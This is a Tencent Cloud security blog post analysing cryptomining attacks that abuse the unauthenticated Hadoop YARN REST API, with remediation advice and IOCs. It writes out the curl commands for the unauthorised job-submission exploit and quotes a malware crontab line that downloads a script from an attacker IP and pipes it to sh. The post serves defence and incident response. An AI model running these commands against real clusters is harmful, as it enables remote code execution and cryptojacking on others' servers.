歡迎大家前往騰訊雲+社區,獲取更多騰訊海量技術實踐干貨哦~
一、背景情況
5月5日騰訊雲安全曾針對攻擊者利用Hadoop Yarn資源管理系統REST API未授權漏洞對服務器進行攻擊,攻擊者可以在未授權的情況下遠程執行代碼的安全問題進行預警,在預警的前后我們曾多次捕獲相關的攻擊案例,其中就包含利用該問題進行挖礦,我們針對其中一個案例進行分析並提供響應的安全建議和解決方案。
二、 漏洞說明
Hadoop是一個由Apache基金會所開發的分布式系統基礎架構,YARN是hadoop系統上的資源統一管理平台,其主要作用是實現集群資源的統一管理和調度,可以把MapReduce計算框架作為一個應用程序運行在YARN系統之上,通過YARN來管理資源。簡單的說,用戶可以向YARN提交特定應用程序進行執行,其中就允許執行相關包含系統命令。
YARN提供有默認開放在8088和8090的REST API(默認前者)允許用戶直接通過API進行相關的應用創建、任務提交執行等操作,如果配置不當,REST API將會開放在公網導致未授權訪問的問題,那么任何黑客則就均可利用其進行遠程命令執行,從而進行挖礦等行為。
攻擊步驟:
- 申請新的application
直接通過curl進行POST請求
curl -v -X POST
'http://ip:8088/ws/v1/cluster/apps/new-application'
返回內容類似於:
- 構造並提交任務
構造json文件1.json,內容如下,其中application-id對應上面得到的id,命令內容為嘗試在/var/tmp目錄下創建11112222_test_111122222文件,內容也為111:
然后直接
curl -s -i -X POST -H 'Accept: application/json' -H 'Content-Type:application/json'
http://ip:8088/ws/v1/cluster/apps --data-binary @1.json
即可完成攻擊,命令被執行,在相應目錄下可以看到生成了對應文件
更多漏洞詳情可以參考
http://bbs.qcloud.com/thread-50090-1-1.html
三、入侵分析
在本次分析的案例中,受害機器部署有Hadoop YARN,並且存在未授權訪問的安全問題,黑客直接利用開放在8088的REST API提交執行命令,來實現在服務器內下載執行.sh腳本,從而再進一步下載啟動挖礦程序達到挖礦的目的。
整個利用過程相對比較簡單,通過捕捉Hadoop 的launch_container.sh執行腳本,我們可以看到其中一個案例中相關任務執行的命令:
可以很明顯的看到第8行位置,從185.222.210.59下載並執行了一個名為x_wcr.sh的腳本。
在實際過程中,我們從多個案例捕獲了多個比如名為cr.sh的不同腳本,但實際的功能代碼都差不多,我們對其中一個x_wcr.sh腳本進行分析,代碼自上而下內容:
這部分代碼主要針對已存在的挖礦進程、文件進行清理。
這部分的代碼主要是判斷如果/tmp/java是一個存在並且可寫的文件,那么就判斷其MD5值是否匹配,MD5不匹配則根據w.conf關鍵詞查找並kill進程;如果非可寫的文件,則重新賦值DIR變量,這個變量主要用於后面部分代碼中下載挖礦等程序存放目錄。
然后接着是一些變量的賦值,包括再次判斷如果/tmp/java是一個目錄,則重新賦值DIR變量;判斷curl和wget命令是否存在,存在則賦值到WGET變量;f2則是賦值為某個IP,實則為是后續下載相關文件的服務器之一。
這部分代碼是其中比較核心的代碼,通過downloadIfNeed方法下載挖礦程序到DIR目錄下並重命名為java,下載w.conf配置文件,給挖礦程序增加執行權限,然后以nohup命令后台運行挖礦程序並刪除配置文件;接着檢查crontab中的任務,如果不存在對應的任務,就將下載執行腳本的任務"* * * * * $LDR http://185.222.210.59/cr.sh | sh > /dev/null 2>&1" 添加到其中,這里LDR為wget -q -O -或者curl,任務每分鍾執行一次。
腳本中還包含了幾個嵌套調用的download方法,入口方法是downloadIfNeed:
這個方法的核心功能還是校驗已存在的挖礦程序的MD5,如果無法驗證或者文件不存在的情況,則直接調用download方法下載挖礦程序;如果文件存在但MD5匹配不正確,則調用download方法后再次驗證,驗證失敗則嘗試從另外一個下載渠道https://transfer.sh/WoGXx/zzz下載挖礦程序並再次驗證。最后還將相關結果上報到目標服務器$f2的re.php.
tmp.txt內容示例:
download方法判斷ppc文件的存在與否和 MD5是否匹配,如果不存在或MD5不匹配則調用download2下載,如果存在則復制重名為java。
download2方法則判斷系統下載對應版本的挖礦程序,其中http://185.222.210.59/g.php返回的是另外一個IP地址;下載成功后則再次驗證,並復制重命名為ppc。
在腳本的最后部分還有一些進程、文件、crontab清理的處理,用pkill刪除滿足條件的進程,刪除tmp目錄下pscd開頭的文件,以及說刪除crontab中存在某些關鍵詞的任務。
至此,我們完成整個腳本的分析,雖然整個腳本比較冗長,而且似乎各個函數嵌套調用,涉及文件也眾多,但其實整體就做了以下幾件事:
1.清理相關的進程、文件和crontab任務
2.判斷並下載挖礦程序,同時校驗MD5值,除了黑客自己控制的服務器,還利用https://transfer.sh提供備用下載,多種方式保障
3.增加腳本下載執行任務添加到crontab里
其實,我們通過查看YARN的日志文件
yarn-root-nodemanager-master.hadoop.log
也可能看到相應的痕跡:
或者我們通過管理UI查看application詳情:
而crontab的任務日志也能看到相關的執行記錄:
最終在/var/tmp目錄下也能找到相關的文件
四、安全建議
清理病毒
1.使用top查看進程,kill掉異常進程
2.檢查/tmp和/var/tmp目錄,刪除java、ppc、w.conf等異常文件
3.檢查crontab任務列表,刪除異常任務
4.排查YARN日志,確認異常的application,刪除處理
安全加固
1.通過iptables或者安全組配置訪問策略,限制對8088等端口的訪問
2.如無必要,不要將接口開放在公網,改為本地或者內網調用
3.升級Hadoop到2.x版本以上,並啟用Kerberos認證功能,禁止匿名訪問
4.雲鏡當前已支持該漏洞檢測,同時也支持挖礦木馬的發現,建議安裝雲鏡並開通專業版,及時發現漏洞並修復或者在中馬后能及時收到提醒進行止損
5.更多自檢和修復建議可以參考
http://bbs.qcloud.com/thread-50090-1-1.html
五、IOCs
錢包地址
4AB31XZu3bKeUWtwGQ43ZadTKCfCzq3wra6yNbKdsucpRfgofJP3YwqDiTutrufk8D17D7xw1zPGyMspv8Lqwwg36V5chYg
MD5
1.c8c1f2da51fbd0aea60e11a81236c9dc
2.183664ceb9c4d7179d5345249f1ee0c4
3.b00f4bbd82d2f5ec7c8152625684f853
礦池地址
1.158.69.133.20:3333
2.192.99.142.249:3333
3.202.144.193.110:3333
4.46.30.43.159:80
部分相關URL
- http://185.222.210.59/x_wcr.sh
- http://185.222.210.59/re.php
- http://185.222.210.59/g.php
- http://185.222.210.59/w.conf
- http://185.222.210.59/cr.sh
- http://192.99.142.226:8220/w.conf
- http://192.99.142.226:8220/xm64
- http://192.99.142.226:8220/cr.sh
- http://95.142.40.83/xm64
- http://95.142.40.83/xm32
- https://transfer.sh/1o3Kj/zzz
- https://transfer.sh/wbl5H/pscf
- https://transfer.sh/WoGXx/zzz
問答
騰訊雲域名安全認證問題?
相關閱讀
Linux Redis自動化挖礦感染蠕蟲分析及安全建議
黑客是如何實現數據庫勒索的 ?
2018雲+未來峰會圓桌面對面:以網絡安全之能,造國之重器
**此文已由作者授權騰訊雲+社區發布,原文鏈接:https://cloud.tencent.com/developer/article/1142503?fromSource=waitui **
歡迎大家前往騰訊雲+社區或關注雲加社區微信公眾號(QcloudCommunity),第一時間獲取更多海量技術實踐干貨哦~